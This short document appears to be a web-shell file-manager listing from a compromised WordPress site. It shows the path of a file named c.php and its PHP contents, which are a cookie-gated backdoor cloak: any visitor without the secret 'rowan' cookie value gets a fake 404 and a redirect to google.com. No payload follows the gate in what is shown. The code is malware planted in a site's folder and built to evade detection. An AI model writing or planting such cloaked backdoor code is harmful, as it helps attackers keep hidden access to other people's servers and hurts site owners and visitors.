Path : /home/easyrentals/public_html/old/wp-mode/ |
Current File : /home/easyrentals/public_html/old/wp-mode/c.php |
<?php $coo = @$_COOKIE["rowan"]; if ($coo != "attkinson") { header('HTTP/1.0 404 Not Found'); die("<html><meta http-equiv='refresh' content='0;url=http://google.com'></html>"); } ?>